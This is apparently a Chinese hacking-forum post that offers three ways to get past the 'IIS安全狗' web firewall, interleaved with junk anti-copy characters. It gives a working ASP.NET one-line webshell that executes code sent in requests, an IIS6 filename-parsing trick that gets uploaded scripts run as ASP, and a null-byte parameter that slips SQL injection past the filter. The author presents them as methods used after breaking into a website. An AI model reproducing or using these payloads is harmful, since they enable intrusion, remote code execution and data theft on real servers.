1、绕过IIS安全狗的一句话。
$ C0 K6 @* X' O, z' k+ I前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。2 |* K9 o7 X1 K4 D* a$ B
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。 [$ f8 z! Y) G
! P, y; n% f- R4 ` X2、IIS6.0解析漏洞遇到安全狗。2 A! Z) ^2 K4 E7 Z
文件名为% z1 s" S4 s( v2 v
http://www.xxxxx.com/sh3llc0de.asp;1.jpg% `# V9 V7 S4 e6 e0 P# P9 A
6 {% p6 R- L4 @' }9 E+ f
这样的会被IIS安全狗果断屏蔽。
) a |/ w4 t) ~/ A改成如下名称,IIS6一样会解析:
- U4 ]9 P2 Q0 F" Lwww.xxxxx.com/;1.asp;1.jpg+ f- ]/ `. ~8 |- r3 i
$ p* ~8 T: T- B6 x9 P
3、安全狗的注入绕过。5 W0 h z4 F# s) V- t8 s/ C' t7 U
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
# }3 ~- T) s- m6 u* O9 c但如果:
n" u. Z$ U% o* hr00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
) I3 l v& ]& [" A; W/ j" ~就可以成功绕过了。
" T& U, |6 w: i* k. w# f3 V. d# O7 q
/ y; C- g" |. c9 g0 G; y; E2 K
|